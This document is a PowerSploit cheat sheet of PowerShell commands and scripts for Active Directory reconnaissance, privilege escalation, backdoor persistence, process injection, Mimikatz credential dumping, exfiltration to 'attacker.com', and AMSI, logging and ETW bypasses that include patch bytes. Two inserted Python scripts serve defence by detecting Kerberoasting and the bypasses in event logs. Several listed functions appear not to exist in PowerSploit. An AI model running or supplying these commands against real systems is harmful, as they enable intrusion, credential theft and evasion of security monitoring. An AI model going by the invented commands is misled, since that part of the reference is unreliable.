# PowerSploit Cheat Sheet

## Overview

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit comprises the following modules: CodeExecution, ScriptModification, Persistence, AntivirusBypass, Exfiltration, Mayhem, Privesc, and Recon. Each module contains several functions that provide various capabilities for post-exploitation activities.

⚠️ Warning: Only use PowerSploit in environments you own or have explicit permission to test. Unauthorized use may violate terms of service or local laws.
## Installation

### Download from GitHub

```powershell
# Download PowerSploit
Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip"

# Extract archive
Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"

# Navigate to PowerSploit directory
cd C:\Tools\PowerSploit-master\
```

### Git Clone

```powershell
# Clone repository
git clone https://github.com/PowerShellMafia/PowerSploit.git

# Navigate to directory
cd PowerSploit
```

### Import Modules

```powershell
# Import all modules
Import-Module .\PowerSploit.psd1

# Import specific modules
Import-Module .\Recon\Recon.psd1
Import-Module .\Privesc\PowerUp.ps1
Import-Module .\Exfiltration\Exfiltration.psd1
Import-Module .\Persistence\Persistence.psd1

# Import from URL (in-memory)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
```

### Bypass Execution Policy

```powershell
# Set the execution policy to Bypass for the current user
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser

# Run with bypass
powershell -ExecutionPolicy Bypass -File script.ps1

# Import with bypass
powershell -ExecutionPolicy Bypass -Command "Import-Module .\PowerSploit.psd1"
```
## Recon Module

### PowerView Functions

```powershell
# Import PowerView
Import-Module .\Recon\PowerView.ps1

# Get domain information
Get-Domain
Get-DomainController
Get-DomainPolicy

# Get forest information
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog

# Domain trust enumeration
Get-DomainTrust
Get-ForestTrust
Get-DomainTrustMapping

# User enumeration
Get-DomainUser
Get-DomainUser -Identity administrator
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user))"
Get-DomainUser -Properties samaccountname,Description

# Group enumeration
Get-DomainGroup
Get-DomainGroup -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainGroup -AdminCount

# Computer enumeration
Get-DomainComputer
Get-DomainComputer -OperatingSystem "*Server*"
Get-DomainComputer -Ping
Get-DomainComputer -Properties name,operatingsystem,serviceprincipalname
```

### Advanced PowerView Queries

```powershell
# Find users with SPN (Kerberoastable)
Get-DomainUser -SPN

# Find computers with unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation

# Find users with constrained delegation
Get-DomainUser -TrustedToAuth

# Find ASREPRoastable users
Get-DomainUser -PreauthNotRequired

# Find users with passwords not required
Get-DomainUser -PasswordNotRequired

# Find users with passwords that don't expire
Get-DomainUser -PasswordNeverExpires

# Find privileged users
Get-DomainUser -AdminCount
Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse

# Find shares
Find-DomainShare
Find-DomainShare -CheckShareAccess

# Find interesting files
Find-InterestingDomainShareFile
Find-InterestingDomainShareFile -Include *.doc,*.docx,*.xls,*.xlsx,*.ppt,*.pptx
```

### Session and Local Admin Enumeration

```powershell
# Find local admin access
Find-LocalAdminAccess
Find-LocalAdminAccess -ComputerName "target-computer"

# Find domain admin sessions
Find-DomainUserLocation
Find-DomainUserLocation -UserIdentity "administrator"

# Get logged on users
Get-NetLoggedon -ComputerName "target-computer"
Get-NetSession -ComputerName "target-computer"

# Get local groups
Get-NetLocalGroup -ComputerName "target-computer"
Get-NetLocalGroupMember -ComputerName "target-computer" -GroupName "Administrators"

# Process enumeration
Get-NetProcess -ComputerName "target-computer"
```

### ACL and Permissions

```powershell
# Get ACLs for objects
Get-ObjectAcl -Identity "Domain Admins"
Get-ObjectAcl -Identity "administrator" -ResolveGUIDs

# Find interesting ACLs
Find-InterestingDomainAcl
Find-InterestingDomainAcl -ResolveGUIDs

# Get path ACLs
Get-PathAcl -Path "\\server\share"

# Add ACL
Add-ObjectAcl -TargetIdentity "target-user" -PrincipalIdentity "attacker-user" -Rights DCSync
```
## Privesc Module (PowerUp)

### Basic Privilege Escalation

```powershell
# Import PowerUp
Import-Module .\Privesc\PowerUp.ps1

# Run all privilege escalation checks
Invoke-AllChecks

# Run specific checks
Invoke-ServiceAbuse
Invoke-PrivescAudit

# Check for unquoted service paths
Get-ServiceUnquoted

# Check for modifiable services
Get-ModifiableService

# Check for modifiable service binaries
Get-ModifiableServiceFile

# Check for AlwaysInstallElevated
Get-RegistryAlwaysInstallElevated

# Check for auto-logon credentials
Get-RegistryAutoLogon

# Check for modifiable scheduled tasks
Get-ModifiableScheduledTaskFile
```

### Service Exploitation

```powershell
# Abuse unquoted service paths
Write-ServiceBinary -Name "VulnService" -Path "C:\Program Files\Vuln Service\service.exe"

# Abuse modifiable services
Invoke-ServiceAbuse -Name "VulnService" -Command "net user backdoor Password123 /add"

# Install service
Install-ServiceBinary -Name "BackdoorService" -Path "C:\Windows\Temp\backdoor.exe"

# Restore service
Restore-ServiceBinary -Name "VulnService"
```

### DLL Hijacking

```powershell
# Find DLL hijacking opportunities
Find-ProcessDLLHijack
Find-PathDLLHijack

# Write hijack DLL
Write-HijackDll -DllPath "C:\Windows\System32\wlbsctrl.dll" -Command "net user backdoor Password123 /add"
```

### Registry Exploitation

```powershell
# Check for auto-elevate binaries
Get-ApplicationHost

# Check for modifiable registry autoruns
Get-ModifiableRegistryAutoRun

# Check for Unattend files
Get-UnattendedInstallFile

# Check for web config files
Get-Webconfig

# Check for cached GPP passwords
Get-CachedGPPPassword
```
## Persistence Module

### Registry Persistence

```powershell
# Import Persistence module
Import-Module .\Persistence\Persistence.psd1

# Add registry persistence
Add-Persistence -Method Registry -Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -Value "backdoor" -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Add WMI persistence
Add-Persistence -Method WMI -EventName "ProcessStart" -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Add scheduled task persistence
Add-Persistence -Method ScheduledTask -TaskName "SystemUpdate" -PayloadPath "C:\Windows\Temp\backdoor.exe" -Trigger "Daily"
```

### WMI Persistence

```powershell
# Install WMI backdoor
Install-WMIBackdoor -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Get WMI backdoor
Get-WMIBackdoor

# Remove WMI backdoor
Remove-WMIBackdoor
```

### User Hunting

```powershell
# Add user hunter
Add-UserHunter -UserName "administrator" -PayloadPath "C:\Windows\Temp\backdoor.exe"

# Get user hunter
Get-UserHunter

# Remove user hunter
Remove-UserHunter
```
## CodeExecution Module

### DLL Injection

```powershell
# Import CodeExecution module
Import-Module .\CodeExecution\CodeExecution.psd1

# Invoke DLL injection
Invoke-DllInjection -ProcessID 1234 -Dll "C:\Windows\Temp\payload.dll"

# Invoke reflective PE injection
Invoke-ReflectivePEInjection -PEPath "C:\Windows\Temp\payload.exe" -ProcessID 1234

# Invoke shellcode injection
Invoke-Shellcode -Shellcode $shellcode -ProcessID 1234
```

### Memory Execution

```powershell
# Execute PE in memory
Invoke-ReflectivePEInjection -PEBytes $PEBytes

# Execute shellcode
$shellcode = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8...)
Invoke-Shellcode -Shellcode $shellcode

# Invoke Mimikatz in memory
Invoke-Mimikatz
Invoke-Mimikatz -Command "sekurlsa::logonpasswords"
```
## Exfiltration Module

### Data Exfiltration

```powershell
# Import Exfiltration module
Import-Module .\Exfiltration\Exfiltration.psd1

# Exfiltrate via DNS
Invoke-DNSExfiltration -Data "sensitive data" -Domain "attacker.com"

# Exfiltrate via ICMP
Invoke-ICMPExfiltration -Data "sensitive data" -Target "attacker-ip"

# Exfiltrate via HTTP
Invoke-HTTPExfiltration -Data "sensitive data" -URL "http://attacker.com/upload"

# Get clipboard contents
Get-ClipboardContents

# Get keystrokes
Get-Keystrokes -LogPath "C:\Windows\Temp\keylog.txt"

# Take screenshots
Get-TimedScreenshot -Path "C:\Windows\Temp\screenshots" -Interval 30
```

### Credential Harvesting

```powershell
# Get stored credentials
Get-VaultCredential
Get-LSASecret

# Dump SAM database
Get-SAMhashes

# Get cached domain credentials
Get-CachedRDPConnection

# Invoke credential prompt
Invoke-CredentialInjection
```
## AntivirusBypass Module

### AV Evasion

```powershell
# Import AntivirusBypass module
Import-Module .\AntivirusBypass\AntivirusBypass.psd1

# Find AV signatures
Find-AVSignature

# Disable Windows Defender
Disable-WindowsDefender

# Bypass AMSI
Invoke-AMSIBypass

# Obfuscate script
Out-ObfuscatedAst -ScriptPath "script.ps1"
```

## ScriptModification Module

### Script Obfuscation

```powershell
# Import ScriptModification module
Import-Module .\ScriptModification\ScriptModification.psd1

# Encode a PowerShell script block
Out-EncodedCommand -ScriptBlock {Get-Process}

# Compress and encode script
Out-CompressedDll -ScriptPath "script.ps1"

# Minify script
Out-MinimizedScript -ScriptPath "script.ps1"
```
## Mayhem Module

### System Disruption

```powershell
# Import Mayhem module
Import-Module .\Mayhem\Mayhem.psd1

# Set wallpaper
Set-Wallpaper -ImagePath "C:\Windows\Temp\image.jpg"

# Set critical process
Set-CriticalProcess -ProcessName "notepad"

# Add machine account to domain
Add-MachineAccountQuota -MachineAccount "FAKE01" -Password "Password123"
```
## Advanced Techniques

### Kerberoasting

```powershell
# Find Kerberoastable users
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname

# Request service tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web.domain.com"

# Export tickets for cracking
Invoke-Mimikatz -Command "kerberos::list /export"
```

### ASREPRoasting

```powershell
# Find ASREPRoastable users
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname

# Request AS-REP for user without pre-auth
Get-ASREPhash -UserName "vulnerable-user" -Domain "domain.com"
```

### Golden Ticket Attack

```powershell
# Get domain SID
Get-DomainSID

# Create golden ticket (requires krbtgt hash)
Invoke-Mimikatz -Command "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi"

# Import golden ticket
Invoke-Mimikatz -Command "kerberos::ptt golden.kirbi"
```

### Silver Ticket Attack

```powershell
# Create silver ticket (requires service account hash)
Invoke-Mimikatz -Command "kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /target:server.domain.com /service:cifs /rc4:hash /ticket:silver.kirbi"

# Import silver ticket
Invoke-Mimikatz -Command "kerberos::ptt silver.kirbi"
```

### DCSync Attack

```powershell
# Perform DCSync (requires replication rights)
Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /user:krbtgt"
Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /user:administrator"

# DCSync all users
Invoke-Mimikatz -Command "lsadump::dcsync /domain:domain.com /all"
```
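The Kerberoasting subsection above shows the operator's side: enumerate accounts with an SPN and request service tickets for them. On the domain controller every one of those requests is recorded as Security event 4769 ("A Kerberos service ticket was requested"), so the defender's counterpart is to look for one account requesting RC4-HMAC (encryption type 0x17) tickets for many distinct service accounts in a short window. The following script is an added example, not code from PowerSploit or the original cheat sheet; the event records, account names, timestamps, the 5-minute window and the threshold of 3 distinct services are all constructed values chosen for illustration.

```python
"""Detect a Kerberoasting pattern in Windows Security event 4769 records.

Added example (not part of the original cheat sheet). The event records
below are constructed sample data, not real logs. Fields mirror the
4769 event data: TargetUserName (requesting account), ServiceName,
TicketEncryptionType and IpAddress.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC

# Constructed sample 4769 events.
SAMPLE_4769_EVENTS = [
    # Normal activity: a user fetching an AES ticket for a file server.
    {"time": "2024-01-10T09:00:01", "account": "alice@CORP.LOCAL", "service": "FS01$", "enc": "0x12", "src": "10.0.0.21"},
    # Suspicious burst: one account requests RC4 tickets for many SPN accounts.
    {"time": "2024-01-10T09:05:00", "account": "bob@CORP.LOCAL", "service": "svc_sql", "enc": "0x17", "src": "10.0.0.55"},
    {"time": "2024-01-10T09:05:01", "account": "bob@CORP.LOCAL", "service": "svc_web", "enc": "0x17", "src": "10.0.0.55"},
    {"time": "2024-01-10T09:05:01", "account": "bob@CORP.LOCAL", "service": "svc_backup", "enc": "0x17", "src": "10.0.0.55"},
    {"time": "2024-01-10T09:05:02", "account": "bob@CORP.LOCAL", "service": "svc_sccm", "enc": "0x17", "src": "10.0.0.55"},
    {"time": "2024-01-10T09:05:02", "account": "bob@CORP.LOCAL", "service": "svc_exchange", "enc": "0x17", "src": "10.0.0.55"},
    # Machine-account and krbtgt tickets are routine and are excluded below.
    {"time": "2024-01-10T09:05:03", "account": "bob@CORP.LOCAL", "service": "DC01$", "enc": "0x17", "src": "10.0.0.55"},
    {"time": "2024-01-10T09:05:03", "account": "bob@CORP.LOCAL", "service": "krbtgt", "enc": "0x17", "src": "10.0.0.55"},
    # A legacy application using RC4 for a single service: below threshold.
    {"time": "2024-01-10T09:30:00", "account": "carol@CORP.LOCAL", "service": "svc_legacy", "enc": "0x17", "src": "10.0.0.77"},
]


def is_user_spn_target(service_name: str) -> bool:
    """True for the service accounts Kerberoasting goes after: user accounts
    holding an SPN, i.e. not a machine account (trailing '$') and not krbtgt."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoasting(events, window=timedelta(minutes=5), threshold=3):
    """Return {account: sorted service names} for every account that requested
    RC4 service tickets for at least `threshold` distinct user SPN accounts
    within some `window`-long period."""
    per_account = defaultdict(list)
    for e in events:
        if e["enc"] != RC4_HMAC or not is_user_spn_target(e["service"]):
            continue
        per_account[e["account"]].append((datetime.fromisoformat(e["time"]), e["service"]))

    findings = {}
    for account, reqs in per_account.items():
        reqs.sort()
        best = set()
        start = 0
        # Sliding window over this account's requests, keeping the largest
        # set of distinct services seen inside any single window.
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            distinct = {svc for _, svc in reqs[start:end + 1]}
            if len(distinct) > len(best):
                best = distinct
        if len(best) >= threshold:
            findings[account] = sorted(best)
    return findings


if __name__ == "__main__":
    for account, services in detect_kerberoasting(SAMPLE_4769_EVENTS).items():
        print(f"[!] possible Kerberoasting by {account}: {', '.join(services)}")
```

The exclusion of machine accounts and krbtgt keeps normal workstation traffic out of the count, and the threshold absorbs the single legacy service that still negotiates RC4. Tuning the window and threshold to the environment, and pairing this with a move of service accounts to AES-only keys and long random passwords, is the mitigation side of the same picture.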
## Automation Scripts

### Domain Enumeration Script

```powershell
#!/usr/bin/env powershell
# PowerSploit Domain Enumeration Script
param(
    [string]$Domain = $env:USERDNSDOMAIN,
    [string]$OutputDir = "C:\temp\enum"
)

# Create output directory
if (!(Test-Path $OutputDir)) {
    New-Item -ItemType Directory -Path $OutputDir -Force
}

# Import PowerView
Import-Module .\Recon\PowerView.ps1

Write-Host "[+] Starting domain enumeration for: $Domain"

try {
    # Domain information
    Write-Host "[+] Collecting domain information..."
    Get-Domain -Domain $Domain | Out-File "$OutputDir\domain_info.txt"
    Get-DomainController -Domain $Domain | Out-File "$OutputDir\domain_controllers.txt"
    Get-DomainPolicy -Domain $Domain | Out-File "$OutputDir\domain_policy.txt"

    # Users
    Write-Host "[+] Enumerating users..."
    Get-DomainUser -Domain $Domain | Out-File "$OutputDir\users.txt"
    Get-DomainUser -Domain $Domain -AdminCount | Out-File "$OutputDir\privileged_users.txt"
    Get-DomainUser -Domain $Domain -SPN | Out-File "$OutputDir\kerberoastable_users.txt"
    Get-DomainUser -Domain $Domain -PreauthNotRequired | Out-File "$OutputDir\asreproastable_users.txt"

    # Groups
    Write-Host "[+] Enumerating groups..."
    Get-DomainGroup -Domain $Domain | Out-File "$OutputDir\groups.txt"
    Get-DomainGroupMember -Identity "Domain Admins" -Domain $Domain | Out-File "$OutputDir\domain_admins.txt"
    Get-DomainGroupMember -Identity "Enterprise Admins" -Domain $Domain | Out-File "$OutputDir\enterprise_admins.txt"

    # Computers
    Write-Host "[+] Enumerating computers..."
    Get-DomainComputer -Domain $Domain | Out-File "$OutputDir\computers.txt"
    Get-DomainComputer -Domain $Domain -UnconstrainedDelegation | Out-File "$OutputDir\unconstrained_delegation.txt"

    # Trusts
    Write-Host "[+] Enumerating trusts..."
    Get-DomainTrust -Domain $Domain | Out-File "$OutputDir\domain_trusts.txt"
    Get-ForestTrust | Out-File "$OutputDir\forest_trusts.txt"

    # Shares
    Write-Host "[+] Finding shares..."
    Find-DomainShare -Domain $Domain | Out-File "$OutputDir\shares.txt"

    Write-Host "[+] Enumeration completed. Results saved to: $OutputDir"
} catch {
    Write-Error "[-] Enumeration failed: $($_.Exception.Message)"
}
```
### Privilege Escalation Check Script

```powershell
#!/usr/bin/env powershell
# PowerSploit Privilege Escalation Check
param(
    [string]$OutputFile = "C:\temp\privesc_results.txt"
)

# Import PowerUp
Import-Module .\Privesc\PowerUp.ps1

Write-Host "[+] Starting privilege escalation checks..."

try {
    # Run all checks and save to file
    Invoke-AllChecks | Tee-Object -FilePath $OutputFile

    Write-Host "[+] Privilege escalation checks completed"
    Write-Host "[+] Results saved to: $OutputFile"

    # Check for immediate wins
    $results = Get-Content $OutputFile
    if ($results -match "Unquoted Service Path") {
        Write-Host "[!] FOUND: Unquoted service paths - potential privilege escalation!"
    }
    if ($results -match "Modifiable Service") {
        Write-Host "[!] FOUND: Modifiable services - potential privilege escalation!"
    }
    if ($results -match "AlwaysInstallElevated") {
        Write-Host "[!] FOUND: AlwaysInstallElevated enabled - potential privilege escalation!"
    }
} catch {
    Write-Error "[-] Privilege escalation checks failed: $($_.Exception.Message)"
}
```
### Credential Harvesting Script

```powershell
#!/usr/bin/env powershell
# PowerSploit Credential Harvesting Script
param(
    [string]$OutputDir = "C:\temp\creds"
)

# Create output directory
if (!(Test-Path $OutputDir)) {
    New-Item -ItemType Directory -Path $OutputDir -Force
}

# Import modules
Import-Module .\Exfiltration\Exfiltration.psd1
Import-Module .\CodeExecution\CodeExecution.psd1

Write-Host "[+] Starting credential harvesting..."

try {
    # Mimikatz - dump credentials
    Write-Host "[+] Running Mimikatz..."
    Invoke-Mimikatz -Command "sekurlsa::logonpasswords" | Out-File "$OutputDir\logonpasswords.txt"
    Invoke-Mimikatz -Command "sekurlsa::wdigest" | Out-File "$OutputDir\wdigest.txt"
    Invoke-Mimikatz -Command "sekurlsa::kerberos" | Out-File "$OutputDir\kerberos.txt"
    Invoke-Mimikatz -Command "sekurlsa::tspkg" | Out-File "$OutputDir\tspkg.txt"

    # Registry secrets
    Write-Host "[+] Extracting registry secrets..."
    Get-LSASecret | Out-File "$OutputDir\lsa_secrets.txt"
    Get-CachedGPPPassword | Out-File "$OutputDir\gpp_passwords.txt"

    # Vault credentials
    Write-Host "[+] Extracting vault credentials..."
    Get-VaultCredential | Out-File "$OutputDir\vault_creds.txt"

    # Browser credentials
    Write-Host "[+] Extracting browser credentials..."
    Get-ChromeDump | Out-File "$OutputDir\chrome_creds.txt"
    Get-FirefoxDump | Out-File "$OutputDir\firefox_creds.txt"

    Write-Host "[+] Credential harvesting completed"
    Write-Host "[+] Results saved to: $OutputDir"
} catch {
    Write-Error "[-] Credential harvesting failed: $($_.Exception.Message)"
}
```
## Evasion Techniques

### AMSI Bypass

```powershell
# Method 1: Reflection
$a = [Ref].Assembly.GetTypes()
$a | ForEach-Object {$_.GetMethods() | ForEach-Object {if($_.Name -like "*AmsiInitialize*") {$_.Invoke($null, @($null, 0))}}}

# Method 2: Memory patching
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
```

### PowerShell Logging Bypass

```powershell
# Disable PowerShell logging
$GPO = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static')
$GPO.SetValue($null, @{})

# Disable script block logging
$settings = [System.Management.Automation.Utils]::GetGroupPolicySettings()
$settings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$settings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
```

### ETW Bypass

```powershell
# Disable ETW
$Provider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
$etwProvider = $Provider.GetField('etwProvider','NonPublic,Static').GetValue($null)
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0)
```
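Each of the three evasion techniques above has to run as PowerShell before it takes effect, and with script block logging enabled the engine writes the block's source to the Microsoft-Windows-PowerShell/Operational log as event 4104 before executing it. The tampering therefore leaves its own identifiers (AmsiInitialize, AmsiScanBuffer, cachedGroupPolicySettings, PSEtwLogProvider, m_enabled, NonPublic reflection) in the log even when it succeeds. The script below is an added detection example, not code from PowerSploit or the original cheat sheet; it scans ScriptBlockText values for those indicators. The event records, user names and indicator names are constructed for illustration.

```python
"""Flag PowerShell script blocks (event 4104 ScriptBlockText) that contain
AMSI, script-block-logging or ETW tampering.

Added example, not part of the original cheat sheet. The indicator names
are our own labels; the patterns are the identifiers the bypass snippets
above use. The script block texts are constructed samples, not real logs.
"""
import re

# (label, pattern). Case-insensitive because PowerShell member lookup is.
TAMPER_INDICATORS = [
    ("amsi-init-reflection", re.compile(r"AmsiInitialize", re.I)),
    ("amsi-scanbuffer-patch", re.compile(r"AmsiScanBuffer", re.I)),
    ("amsi-dll-loadlibrary", re.compile(r"LoadLibrary\(\s*['\"]amsi\.dll['\"]", re.I)),
    ("gpo-cache-clear", re.compile(r"cachedGroupPolicySettings", re.I)),
    ("scriptblock-logging-off", re.compile(r"EnableScriptBlockLogging['\"]\]\s*=\s*0", re.I)),
    ("etw-provider-disable", re.compile(r"PSEtwLogProvider|['\"]m_enabled['\"]", re.I)),
    ("nonpublic-reflection", re.compile(r"NonPublic\s*,\s*(Static|Instance)", re.I)),
]

# Constructed sample 4104 records: event id, user, ScriptBlockText.
SAMPLE_SCRIPT_BLOCKS = [
    {"id": 1, "user": "CORP\\alice", "text": "Get-Service | Where-Object { $_.Status -eq 'Running' }"},
    {"id": 2, "user": "CORP\\bob", "text": "$a=[Ref].Assembly.GetTypes(); $a | % { $_.GetMethods() | % { if ($_.Name -like '*AmsiInitialize*') { $_.Invoke($null,@($null,0)) } } }"},
    {"id": 3, "user": "CORP\\bob", "text": "$GPO=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static'); $GPO.SetValue($null,@{})"},
    {"id": 4, "user": "CORP\\bob", "text": "[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etw,0)"},
    {"id": 5, "user": "CORP\\dave", "text": "Get-ChildItem C:\\Logs -Filter *.log | Measure-Object"},
]


def scan_script_block(text: str) -> list:
    """Return the labels of every tamper indicator found in one script block,
    in TAMPER_INDICATORS order."""
    return [label for label, pattern in TAMPER_INDICATORS if pattern.search(text)]


def find_tampering(blocks, min_hits: int = 1) -> dict:
    """Map event id -> (user, indicator labels) for every block that matches
    at least `min_hits` indicators."""
    findings = {}
    for block in blocks:
        hits = scan_script_block(block["text"])
        if len(hits) >= min_hits:
            findings[block["id"]] = (block["user"], hits)
    return findings


if __name__ == "__main__":
    for event_id, (user, hits) in find_tampering(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"[!] event {event_id} user {user}: {', '.join(hits)}")
```

Two points for deployment: the `nonpublic-reflection` indicator on its own is noisy (legitimate modules use reflection too), so raising `min_hits` to 2 or weighting the AMSI/ETW labels higher is sensible; and because the tampering disables logging only for the current process, the 4104 record for the tampering block itself, and any earlier blocks, still reach the log and a forwarded-event collector.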
## Integration Examples

### Cobalt Strike Integration

```text
# PowerView integration with Cobalt Strike
beacon> powershell-import /path/to/PowerView.ps1
beacon> powershell Get-DomainUser -AdminCount
beacon> powershell Find-LocalAdminAccess

# PowerUp integration
beacon> powershell-import /path/to/PowerUp.ps1
beacon> powershell Invoke-AllChecks

# Mimikatz integration
beacon> powershell Invoke-Mimikatz -Command "sekurlsa::logonpasswords"
```

### Empire Integration

```text
# Use PowerSploit modules in Empire
(Empire: agents) > usemodule powershell/situational_awareness/network/powerview/get_domain_user
(Empire: agents) > usemodule powershell/privesc/powerup/allchecks
(Empire: agents) > usemodule powershell/credentials/mimikatz/logonpasswords
```

### Metasploit Integration

```text
# Use PowerSploit with Metasploit
meterpreter > load powershell
meterpreter > powershell_import /path/to/PowerView.ps1
meterpreter > powershell_execute "Get-DomainUser -AdminCount"

# Post-exploitation modules
use post/windows/gather/enum_domain
use post/windows/escalate/getsystem
use post/windows/gather/credentials/credential_collector
```
## Troubleshooting

### Execution Policy Issues

```powershell
# Check current execution policy
Get-ExecutionPolicy

# Set execution policy
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser

# Bypass for single command
powershell -ExecutionPolicy Bypass -Command "Import-Module .\PowerSploit.psd1"

# Use encoded commands
$command = "Import-Module .\PowerSploit.psd1"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encodedCommand
```

### AMSI Detection

```powershell
# Test AMSI detection
'Invoke-Mimikatz' # Should trigger AMSI

# Obfuscate strings
$cmd = 'Inv' + 'oke-Mim' + 'ikatz'
Invoke-Expression $cmd

# Use variables
$a = 'Invoke-'
$b = 'Mimikatz'
Invoke-Expression ($a + $b)
```

### Module Import Issues

```powershell
# Force import
Import-Module .\PowerSploit.psd1 -Force

# Import with full path
Import-Module "C:\Tools\PowerSploit\PowerSploit.psd1"

# Check module path
$env:PSModulePath

# Add to module path
$env:PSModulePath += ";C:\Tools\PowerSploit"
```

### Network Connectivity Issues

```powershell
# Test network connectivity
Test-NetConnection -ComputerName "target" -Port 445

# Check firewall
Get-NetFirewallRule | Where-Object {$_.Enabled -eq "True"}

# Use alternative ports
Get-DomainController -Server "dc.domain.com:389"
```
## Resources

- Official PowerSploit Repository
- PowerSploit Documentation
- PowerView Cheat Sheet
- PowerUp Documentation
- Active Directory Security
- PowerShell Empire
- BloodHound Integration

This cheat sheet provides a comprehensive reference for using PowerSploit for Windows penetration testing and post-exploitation. Always ensure you have proper authorization before using this tool in any environment.